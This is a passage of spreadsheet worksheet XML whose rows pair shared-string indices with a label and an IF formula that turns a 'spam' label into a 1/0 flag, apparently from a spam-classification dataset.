    <row r="1555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1555" t="s">
        <v>6800</v>
      </c>
      <c r="B1555" t="s">
        <v>5294</v>
      </c>
      <c r="C1555" s="1">
        <f>IF(B1555="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1556" t="s">
        <v>6801</v>
      </c>
      <c r="B1556" t="s">
        <v>5294</v>
      </c>
      <c r="C1556" s="1">
        <f>IF(B1556="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1557" t="s">
        <v>6802</v>
      </c>
      <c r="B1557" t="s">
        <v>5294</v>
      </c>
      <c r="C1557" s="1">
        <f>IF(B1557="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1558" t="s">
        <v>6803</v>
      </c>
      <c r="B1558" t="s">
        <v>5294</v>
      </c>
      <c r="C1558" s="1">
        <f>IF(B1558="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1559" t="s">
        <v>6804</v>
      </c>
      <c r="B1559" t="s">
        <v>5294</v>
      </c>
      <c r="C1559" s="1">
        <f>IF(B1559="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1560" t="s">
        <v>6805</v>
      </c>
      <c r="B1560" t="s">
        <v>5294</v>
      </c>
      <c r="C1560" s="1">
        <f>IF(B1560="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1561" t="s">
        <v>6806</v>
      </c>
      <c r="B1561" t="s">
        <v>5294</v>
      </c>
      <c r="C1561" s="1">
        <f>IF(B1561="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1562" t="s">
        <v>6807</v>
      </c>
      <c r="B1562" t="s">
        <v>5294</v>
      </c>
      <c r="C1562" s="1">
        <f>IF(B1562="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1563" t="s">
        <v>6808</v>
      </c>
      <c r="B1563" t="s">
        <v>5294</v>
      </c>
      <c r="C1563" s="1">
        <f>IF(B1563="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1564" t="s">
        <v>6809</v>
      </c>
      <c r="B1564" t="s">
        <v>5294</v>
      </c>
      <c r="C1564" s="1">
        <f>IF(B1564="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1565" t="s">
        <v>6810</v>
      </c>
      <c r="B1565" t="s">
        <v>5294</v>
      </c>
      <c r="C1565" s="1">
        <f>IF(B1565="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1566" t="s">
        <v>6811</v>
      </c>
      <c r="B1566" t="s">
        <v>5294</v>
      </c>
      <c r="C1566" s="1">
        <f>IF(B1566="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1567" t="s">
        <v>6812</v>
      </c>
      <c r="B1567" t="s">
        <v>5294</v>
      </c>
      <c r="C1567" s="1">
        <f>IF(B1567="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1568" t="s">
        <v>6813</v>
      </c>
      <c r="B1568" t="s">
        <v>5294</v>
      </c>
      <c r="C1568" s="1">
        <f>IF(B1568="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1569" t="s">
        <v>6814</v>
      </c>
      <c r="B1569" t="s">
        <v>5294</v>
      </c>
      <c r="C1569" s="1">
        <f>IF(B1569="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1570" t="s">
        <v>5602</v>
      </c>
      <c r="B1570" t="s">
        <v>5294</v>
      </c>
      <c r="C1570" s="1">
        <f>IF(B1570="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1571" t="s">
        <v>6815</v>
      </c>
      <c r="B1571" t="s">
        <v>5294</v>
      </c>
      <c r="C1571" s="1">
        <f>IF(B1571="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1572" t="s">
        <v>6816</v>
      </c>
      <c r="B1572" t="s">
        <v>5294</v>
      </c>
      <c r="C1572" s="1">
        <f>IF(B1572="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1573" t="s">
        <v>6817</v>
      </c>
      <c r="B1573" t="s">
        <v>5294</v>
      </c>
      <c r="C1573" s="1">
        <f>IF(B1573="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1574" t="s">
        <v>6818</v>
      </c>
      <c r="B1574" t="s">
        <v>5297</v>
      </c>
      <c r="C1574" s="1">
        <f>IF(B1574="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1575" t="s">
        <v>6819</v>
      </c>
      <c r="B1575" t="s">
        <v>5297</v>
      </c>
      <c r="C1575" s="1">
        <f>IF(B1575="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1576" t="s">
        <v>6820</v>
      </c>
      <c r="B1576" t="s">
        <v>5294</v>
      </c>
      <c r="C1576" s="1">
        <f>IF(B1576="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1577" t="s">
        <v>6821</v>
      </c>
      <c r="B1577" t="s">
        <v>5294</v>
      </c>
      <c r="C1577" s="1">
        <f>IF(B1577="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1578" t="s">
        <v>6822</v>
      </c>
      <c r="B1578" t="s">
        <v>5294</v>
      </c>
      <c r="C1578" s="1">
        <f>IF(B1578="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1579" t="s">
        <v>6823</v>
      </c>
      <c r="B1579" t="s">
        <v>5294</v>
      </c>
      <c r="C1579" s="1">
        <f>IF(B1579="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1580" t="s">
        <v>6824</v>
      </c>
      <c r="B1580" t="s">
        <v>5294</v>
      </c>
      <c r="C1580" s="1">
        <f>IF(B1580="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1581" t="s">
        <v>6825</v>
      </c>
      <c r="B1581" t="s">
        <v>5294</v>
      </c>
      <c r="C1581" s="1">
        <f>IF(B1581="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1582" t="s">
        <v>6826</v>
      </c>
      <c r="B1582" t="s">
        <v>5294</v>
      </c>
      <c r="C1582" s="1">
        <f>IF(B1582="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1583" t="s">
        <v>6827</v>
      </c>
      <c r="B1583" t="s">
        <v>5294</v>
      </c>
      <c r="C1583" s="1">
        <f>IF(B1583="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1584" t="s">
        <v>6828</v>
      </c>
      <c r="B1584" t="s">
        <v>5294</v>
      </c>
      <c r="C1584" s="1">
        <f>IF(B1584="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1585" t="s">
        <v>6829</v>
      </c>
      <c r="B1585" t="s">
        <v>5294</v>
      </c>
      <c r="C1585" s="1">
        <f>IF(B1585="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1586" t="s">
        <v>5376</v>
      </c>
      <c r="B1586" t="s">
        <v>5294</v>
      </c>
      <c r="C1586" s="1">
        <f>IF(B1586="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1587" t="s">
        <v>6830</v>
      </c>
      <c r="B1587" t="s">
        <v>5294</v>
      </c>
      <c r="C1587" s="1">
        <f>IF(B1587="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1588" t="s">
        <v>6831</v>
      </c>
      <c r="B1588" t="s">
        <v>5294</v>
      </c>
      <c r="C1588" s="1">
        <f>IF(B1588="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1589" t="s">
        <v>6832</v>
      </c>
      <c r="B1589" t="s">
        <v>5294</v>
      </c>
      <c r="C1589" s="1">
        <f>IF(B1589="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1590" t="s">
        <v>6833</v>
      </c>
      <c r="B1590" t="s">
        <v>5294</v>
      </c>
      <c r="C1590" s="1">
        <f>IF(B1590="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1591" t="s">
        <v>6834</v>
      </c>
      <c r="B1591" t="s">
        <v>5294</v>
      </c>
      <c r="C1591" s="1">
        <f>IF(B1591="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1592" t="s">
        <v>6835</v>
      </c>
      <c r="B1592" t="s">
        <v>5294</v>
      </c>
      <c r="C1592" s="1">
        <f>IF(B1592="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1593" t="s">
        <v>6836</v>
      </c>
      <c r="B1593" t="s">
        <v>5294</v>
      </c>
      <c r="C1593" s="1">
        <f>IF(B1593="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1594" t="s">
        <v>6837</v>
      </c>
      <c r="B1594" t="s">
        <v>5294</v>
      </c>
      <c r="C1594" s="1">
        <f>IF(B1594="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1595" t="s">
        <v>6838</v>
      </c>
      <c r="B1595" t="s">
        <v>5297</v>
      </c>
      <c r="C1595" s="1">
        <f>IF(B1595="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1596" t="s">
        <v>6839</v>
      </c>
      <c r="B1596" t="s">
        <v>5294</v>
      </c>
      <c r="C1596" s="1">
        <f>IF(B1596="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1597" t="s">
        <v>6840</v>
      </c>
      <c r="B1597" t="s">
        <v>5294</v>
      </c>
      <c r="C1597" s="1">
        <f>IF(B1597="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1598" t="s">
        <v>6841</v>
      </c>
      <c r="B1598" t="s">
        <v>5297</v>
      </c>
      <c r="C1598" s="1">
        <f>IF(B1598="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1599" t="s">
        <v>6842</v>
      </c>
      <c r="B1599" t="s">
        <v>5297</v>
      </c>
      <c r="C1599" s="1">
        <f>IF(B1599="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1600" t="s">
        <v>6843</v>
      </c>
      <c r="B1600" t="s">
        <v>5294</v>
      </c>
      <c r="C1600" s="1">
        <f>IF(B1600="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1601" t="s">
        <v>6844</v>
      </c>
      <c r="B1601" t="s">
        <v>5294</v>
      </c>
      <c r="C1601" s="1">
        <f>IF(B1601="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1602" t="s">
        <v>6845</v>
      </c>
      <c r="B1602" t="s">
        <v>5294</v>
      </c>
      <c r="C1602" s="1">
        <f>IF(B1602="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1603" t="s">
        <v>6846</v>
      </c>
      <c r="B1603" t="s">
        <v>5294</v>
      </c>
      <c r="C1603" s="1">
        <f>IF(B1603="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1604" t="s">
        <v>6847</v>
      </c>
      <c r="B1604" t="s">
        <v>5294</v>
      </c>
      <c r="C1604" s="1">
        <f>IF(B1604="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1605" t="s">
        <v>6848</v>
      </c>
      <c r="B1605" t="s">
        <v>5294</v>
      </c>
      <c r="C1605" s="1">
        <f>IF(B1605="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1606" t="s">
        <v>6849</v>
      </c>
      <c r="B1606" t="s">
        <v>5294</v>
      </c>
      <c r="C1606" s="1">
        <f>IF(B1606="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1607" t="s">
        <v>6850</v>
      </c>
      <c r="B1607" t="s">
        <v>5294</v>
      </c>
      <c r="C1607" s="1">
        <f>IF(B1607="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1608" t="s">
        <v>6851</v>
      </c>
      <c r="B1608" t="s">
        <v>5294</v>
      </c>
      <c r="C1608" s="1">
        <f>IF(B1608="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1609" t="s">
        <v>6852</v>
      </c>
      <c r="B1609" t="s">
        <v>5294</v>
      </c>
      <c r="C1609" s="1">
        <f>IF(B1609="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1610" t="s">
        <v>6853</v>
      </c>
      <c r="B1610" t="s">
        <v>5294</v>
      </c>
      <c r="C1610" s="1">
        <f>IF(B1610="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1611" t="s">
        <v>6854</v>
      </c>
      <c r="B1611" t="s">
        <v>5294</v>
      </c>
      <c r="C1611" s="1">
        <f>IF(B1611="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1612" t="s">
        <v>6855</v>
      </c>
      <c r="B1612" t="s">
        <v>5294</v>
      </c>
      <c r="C1612" s="1">
        <f>IF(B1612="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1613" t="s">
        <v>6856</v>
      </c>
      <c r="B1613" t="s">
        <v>5294</v>
      </c>
      <c r="C1613" s="1">
        <f>IF(B1613="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1614" t="s">
        <v>6857</v>
      </c>
      <c r="B1614" t="s">
        <v>5297</v>
      </c>
      <c r="C1614" s="1">
        <f>IF(B1614="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1615" t="s">
        <v>6858</v>
      </c>
      <c r="B1615" t="s">
        <v>5294</v>
      </c>
      <c r="C1615" s="1">
        <f>IF(B1615="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1616" t="s">
        <v>6859</v>
      </c>
      <c r="B1616" t="s">
        <v>5294</v>
      </c>
      <c r="C1616" s="1">
        <f>IF(B1616="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1617" t="s">
        <v>6860</v>
      </c>
      <c r="B1617" t="s">
        <v>5294</v>
      </c>
      <c r="C1617" s="1">
        <f>IF(B1617="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1618" t="s">
        <v>6861</v>
      </c>
      <c r="B1618" t="s">
        <v>5294</v>
      </c>
      <c r="C1618" s="1">
        <f>IF(B1618="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1619" t="s">
        <v>6862</v>
      </c>
      <c r="B1619" t="s">
        <v>5294</v>
      </c>
      <c r="C1619" s="1">
        <f>IF(B1619="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1620" t="s">
        <v>6863</v>
      </c>
      <c r="B1620" t="s">
        <v>5294</v>
      </c>
      <c r="C1620" s="1">
        <f>IF(B1620="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1621" t="s">
        <v>6864</v>
      </c>
      <c r="B1621" t="s">
        <v>5294</v>
      </c>
      <c r="C1621" s="1">
        <f>IF(B1621="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1622" t="s">
        <v>6865</v>
      </c>
      <c r="B1622" t="s">
        <v>5294</v>
      </c>
      <c r="C1622" s="1">
        <f>IF(B1622="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1623" t="s">
        <v>6866</v>
      </c>
      <c r="B1623" t="s">
        <v>5294</v>
      </c>
      <c r="C1623" s="1">
        <f>IF(B1623="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1624" t="s">
        <v>6867</v>
      </c>
      <c r="B1624" t="s">
        <v>5297</v>
      </c>
      <c r="C1624" s="1">
        <f>IF(B1624="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1625" t="s">
        <v>6868</v>
      </c>
      <c r="B1625" t="s">
        <v>5294</v>
      </c>
      <c r="C1625" s="1">
        <f>IF(B1625="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1626" t="s">
        <v>6869</v>
      </c>
      <c r="B1626" t="s">
        <v>5297</v>
      </c>
      <c r="C1626" s="1">
        <f>IF(B1626="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1627" t="s">
        <v>6870</v>
      </c>
      <c r="B1627" t="s">
        <v>5294</v>
      </c>
      <c r="C1627" s="1">
        <f>IF(B1627="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1628" t="s">
        <v>6871</v>
      </c>
      <c r="B1628" t="s">
        <v>5294</v>
      </c>
      <c r="C1628" s="1">
        <f>IF(B1628="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1629" t="s">
        <v>6872</v>
      </c>
      <c r="B1629" t="s">
        <v>5297</v>
      </c>
      <c r="C1629" s="1">
        <f>IF(B1629="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1630" t="s">
        <v>6873</v>
      </c>
      <c r="B1630" t="s">
        <v>5294</v>
      </c>
      <c r="C1630" s="1">
        <f>IF(B1630="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1631" t="s">
        <v>6874</v>
      </c>
      <c r="B1631" t="s">
        <v>5294</v>
      </c>
      <c r="C1631" s="1">
        <f>IF(B1631="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1632" t="s">
        <v>6875</v>
      </c>
      <c r="B1632" t="s">
        <v>5294</v>
      </c>
      <c r="C1632" s="1">
        <f>IF(B1632="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1633" t="s">
        <v>6876</v>
      </c>
      <c r="B1633" t="s">
        <v>5294</v>
      </c>
      <c r="C1633" s="1">
        <f>IF(B1633="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1634" t="s">
        <v>6877</v>
      </c>
      <c r="B1634" t="s">
        <v>5294</v>
      </c>
      <c r="C1634" s="1">
        <f>IF(B1634="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1635" t="s">
        <v>6878</v>
      </c>
      <c r="B1635" t="s">
        <v>5294</v>
      </c>
      <c r="C1635" s="1">
        <f>IF(B1635="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1636" t="s">
        <v>6879</v>
      </c>
      <c r="B1636" t="s">
        <v>5297</v>
      </c>
      <c r="C1636" s="1">
        <f>IF(B1636="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1637" t="s">
        <v>6880</v>
      </c>
      <c r="B1637" t="s">
        <v>5294</v>
      </c>
      <c r="C1637" s="1">
        <f>IF(B1637="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1638" t="s">
        <v>6881</v>
      </c>
      <c r="B1638" t="s">
        <v>5294</v>
      </c>
      <c r="C1638" s="1">
        <f>IF(B1638="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1639" t="s">
        <v>6882</v>
      </c>
      <c r="B1639" t="s">
        <v>5297</v>
      </c>
      <c r="C1639" s="1">
        <f>IF(B1639="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1640" t="s">
        <v>6883</v>
      </c>
      <c r="B1640" t="s">
        <v>5294</v>
      </c>
      <c r="C1640" s="1">
        <f>IF(B1640="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1641" t="s">
        <v>6884</v>
      </c>
      <c r="B1641" t="s">
        <v>5297</v>
      </c>
      <c r="C1641" s="1">
        <f>IF(B1641="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1642" t="s">
        <v>6885</v>
      </c>
      <c r="B1642" t="s">
        <v>5294</v>
      </c>
      <c r="C1642" s="1">
        <f>IF(B1642="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1643" t="s">
        <v>6886</v>
      </c>
      <c r="B1643" t="s">
        <v>5294</v>
      </c>
      <c r="C1643" s="1">
        <f>IF(B1643="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1644" t="s">
        <v>6887</v>
      </c>
      <c r="B1644" t="s">
        <v>5294</v>
      </c>
      <c r="C1644" s="1">
        <f>IF(B1644="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1645" t="s">
        <v>6888</v>
      </c>
      <c r="B1645" t="s">
        <v>5294</v>
      </c>
      <c r="C1645" s="1">
        <f>IF(B1645="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1646" t="s">
        <v>6889</v>
      </c>
      <c r="B1646" t="s">
        <v>5294</v>
      </c>
      <c r="C1646" s="1">
        <f>IF(B1646="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1647" t="s">
        <v>6890</v>
      </c>
      <c r="B1647" t="s">
        <v>5294</v>
      </c>
      <c r="C1647" s="1">
        <f>IF(B1647="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1648" t="s">
        <v>6891</v>
      </c>
      <c r="B1648" t="s">
        <v>5294</v>
      </c>
      <c r="C1648" s="1">
        <f>IF(B1648="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1649" t="s">
        <v>6892</v>
      </c>
      <c r="B1649" t="s">
        <v>5294</v>
      </c>
      <c r="C1649" s="1">
        <f>IF(B1649="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1650" t="s">
        <v>6893</v>
      </c>
      <c r="B1650" t="s">
        <v>5294</v>
      </c>
      <c r="C1650" s="1">
        <f>IF(B1650="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1651" t="s">
        <v>6894</v>
      </c>
      <c r="B1651" t="s">
        <v>5294</v>
      </c>
      <c r="C1651" s="1">
        <f>IF(B1651="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1652" t="s">
        <v>6895</v>
      </c>
      <c r="B1652" t="s">
        <v>5294</v>
      </c>
      <c r="C1652" s="1">
        <f>IF(B1652="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1653" t="s">
        <v>6896</v>
      </c>
      <c r="B1653" t="s">
        <v>5294</v>
      </c>
      <c r="C1653" s="1">
        <f>IF(B1653="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1654" t="s">
        <v>6897</v>
      </c>
      <c r="B1654" t="s">
        <v>5297</v>
      </c>
      <c r="C1654" s="1">
        <f>IF(B1654="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1655" t="s">
        <v>6898</v>
      </c>
      <c r="B1655" t="s">
        <v>5294</v>
      </c>
      <c r="C1655" s="1">
        <f>IF(B1655="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1656" t="s">
        <v>6048</v>
      </c>
      <c r="B1656" t="s">
        <v>5294</v>
      </c>
      <c r="C1656" s="1">
        <f>IF(B1656="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1657" t="s">
        <v>6899</v>
      </c>
      <c r="B1657" t="s">
        <v>5294</v>
      </c>
      <c r="C1657" s="1">
        <f>IF(B1657="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1658" t="s">
        <v>6900</v>
      </c>
      <c r="B1658" t="s">
        <v>5294</v>
      </c>
      <c r="C1658" s="1">
        <f>IF(B1658="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
